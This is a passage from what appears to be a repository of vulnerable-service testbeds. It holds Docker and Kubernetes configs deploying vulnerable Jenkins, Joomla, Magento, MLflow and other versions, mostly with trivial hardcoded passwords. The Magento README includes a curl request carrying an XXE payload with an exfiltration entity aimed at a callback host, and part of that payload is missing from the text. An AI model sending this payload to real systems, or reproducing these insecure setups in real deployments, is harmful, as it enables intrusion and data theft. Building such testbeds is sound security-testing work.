], 7 | "approach": "static", 8 | "requirements": [], 9 | "workers": 1 10 | } 11 | -------------------------------------------------------------------------------- /jenkins/CVE-2017-1000353/README.md: -------------------------------------------------------------------------------- 1 | # Jenkins CVE-2017-1000353 2 | 3 | This directory contains the deployment configs for a Jenkins installation that's 4 | vulnerable to CVE-2017-1000353. 5 | 6 | The deployed service has name `jenkins-cve-2017-1000353` and listens on port 7 | `80`. 8 | -------------------------------------------------------------------------------- /jenkins/CVE-2017-1000353/jenkins.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Jenkins service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: jenkins-cve-2017-1000353 6 | labels: 7 | app: jenkins-cve-2017-1000353 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 8080 13 | selector: 14 | app: jenkins-cve-2017-1000353 15 | type: LoadBalancer 16 | --- 17 | # Jenkins version 2.46.1 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: jenkins-cve-2017-1000353 22 | labels: 23 | app: jenkins-cve-2017-1000353 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: jenkins-cve-2017-1000353 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: jenkins-cve-2017-1000353 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: jenkins-cve-2017-1000353 39 | image: jenkins:2.46.1 40 | ports: 41 | - containerPort: 8080 42 | -------------------------------------------------------------------------------- /jenkins/CVE-2024-23897/README.md: -------------------------------------------------------------------------------- 1 | # Jenkins CVE-2024-23897 2 | 3 | This directory contains the deployment config for Jenkins with exposed endpoint 4 | vulnerable to CVE-2024-23897. 
Jenkins weekly versions before 2.442 and Jenkins 5 | LTS versions before 2.426.3 have this vulnerability. 6 | 7 | The deployed service listens on port `8080` after the installation guide. 8 | 9 | ## Vulnerable version 10 | docker run -it -p 8080:8080 jenkins/jenkins:2.426.2 11 | 12 | ## Fixed version 13 | docker run -it -p 8080:8080 jenkins/jenkins:2.426.3 14 | -------------------------------------------------------------------------------- /jenkins/weak_credentials/jenkins.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | # Setup 3 | 1: Create docker images with this command: `docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:lts-jdk11` 4 | 5 | 2: Verify docker is up with this command and check ports: `docker ps` 6 | 7 | 3: Connect to it locally by going to localhost:8080 8 | 9 | 4: Configure it using the setup client. During the docker boot up it will print a secret password, copy and paste it into the client to proceed. 10 | 11 | 5: Verify to see if working properly: Log in by visiting localhost:8080 and using root credentials 12 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/README.md: -------------------------------------------------------------------------------- 1 | # Joomla CVE-2015-8562 2 | 3 | This directory contains the deployment configs for an setup Joomla installation 4 | that's vulnerable to CVE-2015-8562 (Joomla HTTP Header Unauthenticated Remote 5 | Code Execution). 6 | 7 | The deployed service has name `joomla-cve-2015-8562` and listens on port `80`. 8 | 9 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the Joomla app. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: joomla-cve-2015-8562 6 | labels: 7 | app: joomla-cve-2015-8562 8 | spec: 9 | ports: 10 | - port: 80 11 | selector: 12 | app: joomla-cve-2015-8562 13 | tier: frontend 14 | type: LoadBalancer 15 | --- 16 | # Joomla application. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: joomla-cve-2015-8562 21 | labels: 22 | app: joomla-cve-2015-8562 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: joomla-cve-2015-8562 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: joomla-cve-2015-8562 34 | tier: frontend 35 | spec: 36 | containers: 37 | - image: ${joomla_img} 38 | name: joomla-cve-2015-8562 39 | env: 40 | - name: JOOMLA_DB_HOST 41 | value: "joomla-cve-2015-8562-mysql:3306" 42 | - name: JOOMLA_DB_PASSWORD 43 | value: "joomla" 44 | ports: 45 | - containerPort: 80 46 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla_img/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM joomla:3.4.3-apache 2 | 3 | COPY config/configuration.php /var/www/html/configuration.php 4 | COPY config/custom_entry.sh /custom_entry.sh 5 | ENTRYPOINT ["/custom_entry.sh"] 6 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla_img/config/configuration.php: -------------------------------------------------------------------------------- 1 | Please check back again soon.'; 5 | public $display_offline_message = '1'; 6 | public $offline_image = ''; 7 | public $sitename = 'Testbed'; 8 | public $editor = 'tinymce'; 9 | public $captcha = '0'; 10 | public $list_limit = '20'; 11 | public $access = '1'; 12 | public $debug = '0'; 13 | public $debug_lang = '0'; 14 | public $dbtype = 'mysqli'; 15 | public $host = 'joomla-cve-2015-8562-mysql:3306'; 16 | public $user = 'root'; 17 | public $password = 
'joomla'; 18 | public $db = 'joomla'; 19 | public $dbprefix = 'rst5x_'; 20 | public $live_site = ''; 21 | public $secret = '7q330HJ0V1KKHZav'; 22 | public $gzip = '0'; 23 | public $error_reporting = 'default'; 24 | public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}'; 25 | public $ftp_host = ''; 26 | public $ftp_port = ''; 27 | public $ftp_user = ''; 28 | public $ftp_pass = ''; 29 | public $ftp_root = ''; 30 | public $ftp_enable = '0'; 31 | public $offset = 'UTC'; 32 | public $mailonline = '1'; 33 | public $mailer = 'mail'; 34 | public $mailfrom = 'noreply@google.com'; 35 | public $fromname = 'Testbed'; 36 | public $sendmail = '/usr/sbin/sendmail'; 37 | public $smtpauth = '0'; 38 | public $smtpuser = ''; 39 | public $smtppass = ''; 40 | public $smtphost = 'localhost'; 41 | public $smtpsecure = 'none'; 42 | public $smtpport = '25'; 43 | public $caching = '0'; 44 | public $cache_handler = 'file'; 45 | public $cachetime = '15'; 46 | public $MetaDesc = ''; 47 | public $MetaKeys = ''; 48 | public $MetaTitle = '1'; 49 | public $MetaAuthor = '1'; 50 | public $MetaVersion = '0'; 51 | public $robots = ''; 52 | public $sef = '1'; 53 | public $sef_rewrite = '0'; 54 | public $sef_suffix = '0'; 55 | public $unicodeslugs = '0'; 56 | public $feed_limit = '10'; 57 | public $log_path = '/var/www/html/logs'; 58 | public $tmp_path = '/var/www/html/tmp'; 59 | public $lifetime = '15'; 60 | public $session_handler = 'database'; 61 | } 62 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/joomla_img/config/custom_entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | /entrypoint.sh apache2-foreground & 3 | while [[ ! 
-d /var/www/html/installation ]] 4 | do 5 | sleep 1; 6 | done; 7 | rm -rf /var/www/html/installation 8 | tail -f /dev/null 9 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/mysql.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the MySQL service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: joomla-cve-2015-8562-mysql 6 | labels: 7 | app: joomla-cve-2015-8562 8 | spec: 9 | ports: 10 | - port: 3306 11 | selector: 12 | app: joomla-cve-2015-8562 13 | tier: joomla-cve-2015-8562-mysql 14 | clusterIP: None 15 | --- 16 | # The MySQL app. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: joomla-cve-2015-8562-mysql 21 | labels: 22 | app: joomla-cve-2015-8562 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: joomla-cve-2015-8562 27 | tier: joomla-cve-2015-8562-mysql 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: joomla-cve-2015-8562 34 | tier: joomla-cve-2015-8562-mysql 35 | spec: 36 | containers: 37 | - image: ${mysql_img} 38 | name: joomla-cve-2015-8562-mysql 39 | env: 40 | - name: MYSQL_ROOT_PASSWORD 41 | value: "joomla" 42 | ports: 43 | - containerPort: 3306 44 | -------------------------------------------------------------------------------- /joomla/CVE-2015-8562/mysql_img/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mysql:5.7 2 | 3 | COPY config/joomla.sql /docker-entrypoint-initdb.d/joomla.sql 4 | -------------------------------------------------------------------------------- /joomla/CVE-2023-23752/Readme.md: -------------------------------------------------------------------------------- 1 | # vulnerable instance 2 | run `docker compose -f docker-compose-vulnerable.yml up` and open http://localhost:8000/ and then use the following information to finish the initial setup of the new Joomla instance: 3 | ``` 
4 | Database type: MySQLi 5 | 6 | Enter the host name, usually "localhost" or a name provided by your host: 7 | joomlaDb 8 | 9 | Either a username you created or a username provided by your host: 10 | root 11 | 12 | Either a password you created or a password provided by your host: 13 | example 14 | 15 | ``` 16 | Run `curl http://localhost:8000/api/index.php/v1/config/application?public=true` to confirm the exposed data. 17 | 18 | # secure instance 19 | first run `docker compose -f docker-compose-vulnerable.yml down` and then run `docker compose -f docker-compose-safe.yml up` and open http://localhost:8000/ and then use the following information to finish the initial setup of the new Joomla instance: 20 | ``` 21 | Database type: MySQLi 22 | 23 | Enter the host name, usually "localhost" or a name provided by your host: 24 | joomlaDb 25 | 26 | Either a username you created or a username provided by your host: 27 | root 28 | 29 | Either a password you created or a password provided by your host: 30 | example 31 | ``` 32 | Run `curl http://localhost:8000/api/index.php/v1/config/application?public=true` to confirm that this instance is secure. you should receive the `{"errors":[{"title":"Forbidden"}]}` in response. 
33 | -------------------------------------------------------------------------------- /joomla/CVE-2023-23752/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | name: joomla-cve-2023-23752-safe 2 | services: 3 | joomla: 4 | image: joomla:4.2.8-php8.0 5 | ports: 6 | - 8000:80 7 | environment: 8 | JOOMLA_DB_HOST: joomladb 9 | JOOMLA_DB_PASSWORD: example 10 | depends_on: 11 | - joomlaDb 12 | 13 | joomlaDb: 14 | image: mysql:5.6 15 | environment: 16 | MYSQL_ROOT_PASSWORD: example 17 | -------------------------------------------------------------------------------- /joomla/CVE-2023-23752/docker-compose-vulnerable.yml: -------------------------------------------------------------------------------- 1 | name: joomla-cve-2023-23752-vulnerable 2 | services: 3 | joomla: 4 | image: joomla:4.2.6-php8.0 5 | ports: 6 | - 8000:80 7 | environment: 8 | JOOMLA_DB_HOST: joomladb 9 | JOOMLA_DB_PASSWORD: example 10 | depends_on: 11 | - joomlaDb 12 | 13 | joomlaDb: 14 | image: mysql:5.6 15 | environment: 16 | MYSQL_ROOT_PASSWORD: example 17 | -------------------------------------------------------------------------------- /joomla/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.1' 2 | 3 | services: 4 | joomla: 5 | image: joomla:latest 6 | restart: always 7 | links: 8 | - joomladb:mysql 9 | ports: 10 | - 8080:80 11 | environment: 12 | JOOMLA_DB_HOST: joomladb 13 | JOOMLA_DB_PASSWORD: example 14 | 15 | joomladb: 16 | image: mysql:5.6 17 | restart: always 18 | ports: 19 | - 3306:3306 20 | environment: 21 | MYSQL_ROOT_PASSWORD: example -------------------------------------------------------------------------------- /joomla/weak_credentials/joomla.md: -------------------------------------------------------------------------------- 1 | # Joomla 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to view the selected password 5 | 6 | 2. 
Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Connect to it locally by going to `localhost:8080` and configure it using the setup client 9 | 10 | 4. Verify to see if working properly: Log in by visiting `localhost:8080` and using root credentials 11 | -------------------------------------------------------------------------------- /jupyter/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Jupyter Notebook 2 | 3 | This directory contains the deployment configs for a simple Jupyter Notebook 4 | application. The service listens on port `80`. 5 | 6 | This configs deploys the following services: 7 | 8 | - `jupyter`: the Jupyter Notebook application. 9 | -------------------------------------------------------------------------------- /jupyter/exposed_ui/jupyter.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Jupyter Notebook app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: jupyter 6 | labels: 7 | app: jupyter 8 | version: ${jupyter_version} 9 | spec: 10 | ports: 11 | - port: 80 12 | name: http 13 | targetPort: 8888 14 | selector: 15 | app: jupyter 16 | version: ${jupyter_version} 17 | type: LoadBalancer 18 | --- 19 | # The Jupyter Notebook app. 
20 | apiVersion: apps/v1 21 | kind: Deployment 22 | metadata: 23 | name: jupyter 24 | labels: 25 | app: jupyter 26 | version: ${jupyter_version} 27 | spec: 28 | selector: 29 | matchLabels: 30 | app: jupyter 31 | version: ${jupyter_version} 32 | tier: frontend 33 | strategy: 34 | type: Recreate 35 | template: 36 | metadata: 37 | labels: 38 | app: jupyter 39 | tier: frontend 40 | version: ${jupyter_version} 41 | spec: 42 | containers: 43 | - name: jupyter 44 | image: jupyter/base-notebook:${jupyter_version} 45 | ports: 46 | - containerPort: 8888 47 | command: [ "start-notebook.sh" ] 48 | args: [ "--NotebookApp.token='${notebook_token}'" ] 49 | -------------------------------------------------------------------------------- /liferay/liferay-portal/CVE-2020-7961/README.md: -------------------------------------------------------------------------------- 1 | # Liferay Portal 2 | 3 | This directory contains the deployment configs for Liferay Portal. The service 4 | listens on port 80. Version `7.2.0-ga1`is vulnerable. 5 | 6 | This configs deploys the following services: 7 | 8 | - `liferay-portal`: the application 9 | -------------------------------------------------------------------------------- /liferay/liferay-portal/CVE-2020-7961/liferay-portal.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Liferay Portal. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: liferay-portal 6 | labels: 7 | app: liferay-portal 8 | version: ${liferay_portal_version} 9 | spec: 10 | ports: 11 | - port: 80 12 | name: http 13 | targetPort: 8080 14 | selector: 15 | app: liferay-portal 16 | version: ${liferay_portal_version} 17 | type: LoadBalancer 18 | --- 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | name: liferay-portal 23 | labels: 24 | app: liferay-portal 25 | version: ${liferay_portal_version} 26 | spec: 27 | selector: 28 | matchLabels: 29 | app: liferay-portal 30 | version: ${liferay_portal_version} 31 | tier: frontend 32 | strategy: 33 | type: Recreate 34 | template: 35 | metadata: 36 | labels: 37 | app: liferay-portal 38 | tier: frontend 39 | version: ${liferay_portal_version} 40 | spec: 41 | containers: 42 | - name: liferay-portal 43 | image: liferay/portal:${liferay_portal_version} 44 | ports: 45 | - containerPort: 8080 46 | -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/README.md: -------------------------------------------------------------------------------- 1 | # Magento / Adobe Commerce CosmicSting XXE (CVE-2024-34102) 2 | 3 | ## Description 4 | Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that can lead to arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) can accomplished by combining this issue with another vulnerability, such as the [PHP iconv RCE](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1). 5 | 6 | ## Launch Testbed 7 | 8 | ### Vulnerable version 9 | Launch vulnerable version: Magento v2.4.7-p0. 
10 | ```sh 11 | docker compose -f docker-compose-vuln.yml up 12 | ``` 13 | 14 | ### Safe version 15 | Launch safe version: Magento v2.4.7-p2. 16 | ```sh 17 | docker compose -f docker-compose-safe.yml up 18 | ``` 19 | 20 | ## Vulnerability Test 21 | You can use the following command to check whether the instance is vulnerable or not (credits to vicarius.io): 22 | ```sh 23 | curl -k -X POST \ 24 | http://127.0.0.1:8080/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \ 25 | -H "Content-Type: application/json" \ 26 | -d '{ 27 | "address": { 28 | "totalsReader": { 29 | "collectorList": { 30 | "totalCollector": { 31 | "sourceData": { 32 | "data": " \"> %sp; %param1; ]>&exfil;", 33 | "options": 16 34 | } 35 | } 36 | } 37 | } 38 | } 39 | }' 40 | ``` 41 | 42 | A vulnerable instance will reply with the following message: 43 | ```json 44 | {"message":"Internal Error. Details are available in Magento log file. Report ID: webapi-66d8a8d363765"} 45 | ``` 46 | while a safe instance will output the following: 47 | ```json 48 | {"message":"Invalid data type"} 49 | ``` 50 | Moreover, you can replace `` with the URL of a request canary service (such as Burp Collaborator) to verify if you receive a callback. A safe instance will not fetch the URL, while a vulnerable one will. 
51 | 52 | ## Affected Versions 53 | - 2.4.7 and earlier 54 | - 2.4.6-p5 and earlier 55 | - 2.4.5-p7 and earlier 56 | - 2.4.4-p8 and earlier 57 | - 2.4.3-ext-7 and earlier* 58 | - 2.4.2-ext-7 and earlier* 59 | 60 | *These versions are only applicable to customers participating in the Extended Support Program 61 | 62 | ## References 63 | - [CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)](https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102) 64 | - [NIST: CVE-2024-34102](https://nvd.nist.gov/vuln/detail/CVE-2024-34102) 65 | - [Adobe Security Bulletin APSB24-40](https://helpx.adobe.com/security/products/magento/apsb24-40.html) 66 | -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/apply-patch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "==== Patching Magento against CosmicSting XXE (CVE-2024-34102)" 4 | echo "Installing tools needed to apply patch" 5 | export DEBIAN_FRONTEND=noninteractive 6 | apt-get update -y 7 | apt-get install -y wget unzip patch 8 | 9 | echo "Downloading patch from Adobe's website" 10 | cd /opt/bitnami/magento 11 | wget "https://experienceleague.adobe.com/docs/commerce-knowledge-base/assets/VULN-27015-2.4.7x_v2_COMPOSER_patch.zip" 12 | unzip -o VULN-27015-2.4.7x_v2_COMPOSER_patch.zip 13 | 14 | echo "Applying patch" 15 | patch -p1 < VULN-27015-2.4.7x_v2.composer.patch 16 | 17 | echo "==== Patching done. Starting Magento now. 
====" 18 | /opt/bitnami/scripts/magento/entrypoint.sh /opt/bitnami/scripts/magento/run.sh -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | # Original from: https://raw.githubusercontent.com/bitnami/containers/main/bitnami/magento/docker-compose.yml 2 | # Copyright Broadcom, Inc. All Rights Reserved. 3 | # SPDX-License-Identifier: APACHE-2.0 4 | 5 | name: magento-safe 6 | services: 7 | mariadb: 8 | image: docker.io/bitnami/mariadb:10.6 9 | environment: 10 | - ALLOW_EMPTY_PASSWORD=yes 11 | - MARIADB_USER=bn_magento 12 | - MARIADB_DATABASE=bitnami_magento 13 | magento: 14 | image: docker.io/bitnami/magento:2.4.7-debian-12-r15 15 | ports: 16 | - '8080:8080' 17 | environment: 18 | - MAGENTO_HOST=127.0.0.1:8080 19 | - MAGENTO_DATABASE_HOST=mariadb 20 | - MAGENTO_DATABASE_PORT_NUMBER=3306 21 | - MAGENTO_DATABASE_USER=bn_magento 22 | - MAGENTO_DATABASE_NAME=bitnami_magento 23 | - ELASTICSEARCH_HOST=elasticsearch 24 | - ELASTICSEARCH_PORT_NUMBER=9200 25 | - ALLOW_EMPTY_PASSWORD=yes 26 | depends_on: 27 | - mariadb 28 | - elasticsearch 29 | # The apply-patch.sh script will apply the vulnerability patch before Magento is set up 30 | volumes: 31 | - './apply-patch.sh:/apply-patch.sh' 32 | command: /apply-patch.sh 33 | elasticsearch: 34 | image: docker.io/bitnami/elasticsearch:7 35 | -------------------------------------------------------------------------------- /magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml: -------------------------------------------------------------------------------- 1 | # Original from: https://raw.githubusercontent.com/bitnami/containers/main/bitnami/magento/docker-compose.yml 2 | # Copyright Broadcom, Inc. All Rights Reserved. 
3 | # SPDX-License-Identifier: APACHE-2.0 4 | 5 | name: magento-vulnerable 6 | services: 7 | mariadb: 8 | image: docker.io/bitnami/mariadb:10.6 9 | environment: 10 | - ALLOW_EMPTY_PASSWORD=yes 11 | - MARIADB_USER=bn_magento 12 | - MARIADB_DATABASE=bitnami_magento 13 | magento: 14 | image: docker.io/bitnami/magento:2.4.7-debian-12-r15 15 | ports: 16 | - '8080:8080' 17 | environment: 18 | - MAGENTO_HOST=127.0.0.1:8080 19 | - MAGENTO_DATABASE_HOST=mariadb 20 | - MAGENTO_DATABASE_PORT_NUMBER=3306 21 | - MAGENTO_DATABASE_USER=bn_magento 22 | - MAGENTO_DATABASE_NAME=bitnami_magento 23 | - ELASTICSEARCH_HOST=elasticsearch 24 | - ELASTICSEARCH_PORT_NUMBER=9200 25 | - ALLOW_EMPTY_PASSWORD=yes 26 | depends_on: 27 | - mariadb 28 | - elasticsearch 29 | elasticsearch: 30 | image: docker.io/bitnami/elasticsearch:7 -------------------------------------------------------------------------------- /microsoft/mssql/weak_credentials/mssql.md: -------------------------------------------------------------------------------- 1 | # MSSQL 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name -e "ACCEPT_EULA=Y" -e "MSSQL_SA_PASSWORD=" -p 1433:1433 -d mcr.microsoft.com/mssql/server:2022-latest` 5 | * Note: Password requirement for root user: A strong system administrator (SA) password: At least 8 characters including uppercase, lowercase letters, base-10 digits and/or non-alphanumeric symbols. 6 | 7 | 2. Verify MSSQL is working as intended: `docker exec -it /opt/mssql-tools/bin/sqlcmd -S -U sa -P ` -------------------------------------------------------------------------------- /microsoft/rdp/weak_credentials/rdp.md: -------------------------------------------------------------------------------- 1 | # RDP 2 | # Setup 3 | 1. Create a Windows server machine on GCE. 4 | 5 | 2. 
Once the instance is created, follow the instructions in the following link to generate a new password: https://cloud.google.com/compute/docs/instances/windows/generating-credentials#generate_credentials 6 | 7 | 3. Download Remote Desktop Viewer at the Google Software Center or use another RDP client. 8 | 4. Connect to the host using the set username and password. -------------------------------------------------------------------------------- /mlflow/CVE-2023-1177/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2023-1177 2 | 3 | mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models. Affected versions of this package are vulnerable to Improper Access Control which enables malicious actors to download arbitrary files unrelated to MLflow from the host server, including any files stored in remote locations to which the host server has access. 4 | 5 | ```sh 6 | docker-compose -f docker-compose.yml up 7 | ``` 8 | 9 | It takes several minutes to wait for the service to be accessed normally, and the exposed web service port is [15000]. 10 | 11 | ## Environment Variable List 12 | 13 | > The environment variables starting with AWS are used for MINIO configuration. 
14 | 15 | - AWS_ACCESS_KEY_ID 16 | - AWS_SECRET_ACCESS_KEY 17 | - AWS_REGION 18 | - AWS_BUCKET_NAME 19 | - MYSQL_DATABASE 20 | - MYSQL_ROOT_PASSWORD 21 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-1177/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | services: 3 | s3: 4 | image: minio/minio:RELEASE.2021-11-24T23-19-33Z 5 | restart: unless-stopped 6 | ports: 7 | - "9000:9000" 8 | - "9001:9001" 9 | environment: 10 | - MINIO_ROOT_USER=${AWS_ACCESS_KEY_ID} 11 | - MINIO_ROOT_PASSWORD=${AWS_SECRET_ACCESS_KEY} 12 | command: server /data --console-address ":9001" 13 | networks: 14 | - internal 15 | - public 16 | volumes: 17 | - minio_volume:/data 18 | db: 19 | image: mysql:8.2.0 20 | restart: unless-stopped 21 | container_name: mlflow_db 22 | expose: 23 | - "3306" 24 | environment: 25 | - MYSQL_DATABASE=${MYSQL_DATABASE} 26 | - MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD} 27 | - MYSQL_ROOT_HOST=% 28 | networks: 29 | - internal 30 | mlflow: 31 | container_name: tracker_mlflow_vuln 32 | image: tracker_ml_vuln 33 | restart: unless-stopped 34 | build: 35 | context: ./mlflow-vuln 36 | dockerfile: Dockerfile 37 | ports: 38 | - "15000:5000" 39 | environment: 40 | - AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID} 41 | - AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY} 42 | - AWS_DEFAULT_REGION=${AWS_REGION} 43 | - MLFLOW_S3_ENDPOINT_URL=http://s3:9000 44 | networks: 45 | - public 46 | - internal 47 | entrypoint: mlflow server --backend-store-uri mysql+pymysql://root:${MYSQL_ROOT_PASSWORD}@db:3306/${MYSQL_DATABASE} --default-artifact-root s3://${AWS_BUCKET_NAME}/ --artifacts-destination s3://${AWS_BUCKET_NAME}/ -h 0.0.0.0 48 | depends_on: 49 | wait-for-db: 50 | condition: service_completed_successfully 51 | create_s3_buckets: 52 | image: minio/mc 53 | depends_on: 54 | - "s3" 55 | entrypoint: > 56 | /bin/sh -c " 57 | until (/usr/bin/mc alias set minio http://s3:9000 
'${AWS_ACCESS_KEY_ID}' '${AWS_SECRET_ACCESS_KEY}') do echo '...waiting...' && sleep 1; done; 58 | /usr/bin/mc mb minio/${AWS_BUCKET_NAME}; 59 | exit 0; 60 | " 61 | networks: 62 | - internal 63 | wait-for-db: 64 | image: atkrad/wait4x 65 | depends_on: 66 | - db 67 | command: tcp db:3306 -t 90s -i 250ms 68 | networks: 69 | - internal 70 | networks: 71 | internal: 72 | public: 73 | driver: bridge 74 | volumes: 75 | db_volume: 76 | minio_volume: 77 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-1177/mlflow-vuln/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ghcr.io/mlflow/mlflow:v2.0.0 2 | 3 | RUN pip install boto3 pymysql cryptography 4 | 5 | ADD . /app 6 | WORKDIR /app 7 | 8 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2023-6014 2 | 3 | This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2023-6014. MLflow versions below 2.8.0 are vulnerable to that authentication bypass vulnerability. 4 | 5 | The deployed service listens on port `5000` after the docker completes its job. 
6 | 7 | ## Vulnerable version 8 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.7.1 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 9 | 10 | ## Fixed version 11 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.8.1 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 12 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 
14 | FROM ghcr.io/mlflow/mlflow:v2.6.0 as chroot 15 | 16 | RUN /usr/sbin/useradd -u 1000 user 17 | COPY flag / 18 | COPY chal.sh /home/user/ 19 | COPY socat /home/user/ 20 | RUN mkdir /home/user/mlruns 21 | 22 | FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f 23 | 24 | COPY --from=chroot / /chroot 25 | 26 | COPY nsjail.cfg /home/user/ 27 | 28 | CMD kctf_setup && \ 29 | kctf_drop_privs \ 30 | socat \ 31 | TCP-LISTEN:1337,reuseaddr,fork \ 32 | EXEC:"nsjail --config /home/user/nsjail.cfg -- /home/user/chal.sh" -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/README.md: -------------------------------------------------------------------------------- 1 | Prerequisite: To build the image from the Dockerfile, a socat binary is required to be copied to current folder. 2 | 3 | 4 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/chal.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | mlflow server --host 127.0.0.1:5000 2>&1 & 3 | 4 | /home/user/socat TCP:127.0.0.1::5000,retry,forever stdio 5 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6014/challenge/nsjail.cfg: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
